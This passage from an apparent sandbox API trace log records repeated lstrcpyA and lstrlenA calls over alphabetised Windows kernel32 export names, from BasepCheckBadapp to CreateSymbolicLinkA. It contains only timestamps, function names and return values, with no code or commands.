lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.397] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.397] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.397] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.397] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.397] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.397] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.397] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.397] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.397] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.397] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.397] lstrlenA (lpString="BEEP") returned 4 [0079.397] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.397] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.397] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.397] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.397] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.397] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.397] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.397] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.397] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.397] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.397] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.397] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.397] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.397] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.398] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.398] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.398] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.398] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.398] lstrlenA (lpString="CANCELIO") returned 8 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.398] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.398] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.398] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.398] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.398] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.398] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.398] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.398] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.398] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.398] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.398] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.398] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.398] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.399] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.399] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.399] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.399] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.399] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.399] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.399] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.399] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.399] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.399] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.399] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.399] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.399] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.399] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.399] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.399] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.399] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.399] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.399] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.400] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.400] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.400] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.400] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.400] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.400] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.400] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.400] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.400] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.400] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.400] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.400] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.400] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.400] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.400] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.400] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.400] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.400] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.400] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.400] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.400] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.400] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.400] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.400] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.400] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.401] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.401] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.401] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.401] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.401] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.401] lstrlenA (lpString="COPYFILEA") returned 9 [0079.401] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.401] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.401] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.401] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.401] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.401] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.401] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.401] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.401] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.401] lstrlenA (lpString="COPYFILEW") returned 9 [0079.401] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.401] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.401] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.401] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.401] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.401] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.401] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.401] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.401] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.401] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.401] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.401] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.401] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.401] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.402] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.402] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.402] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.402] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.402] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.402] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.402] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.402] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.402] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.402] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.402] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.402] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.402] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.402] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.402] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.402] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.402] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.402] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.402] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.403] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.403] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.403] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.403] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.403] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.403] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.403] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.403] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.403] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.403] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.403] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.403] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.403] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.403] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.403] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.403] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.403] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.403] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.403] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.404] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.404] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.404] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.404] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.404] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.404] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.404] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.404] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.404] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.404] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.404] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.404] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.404] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.404] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.404] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") 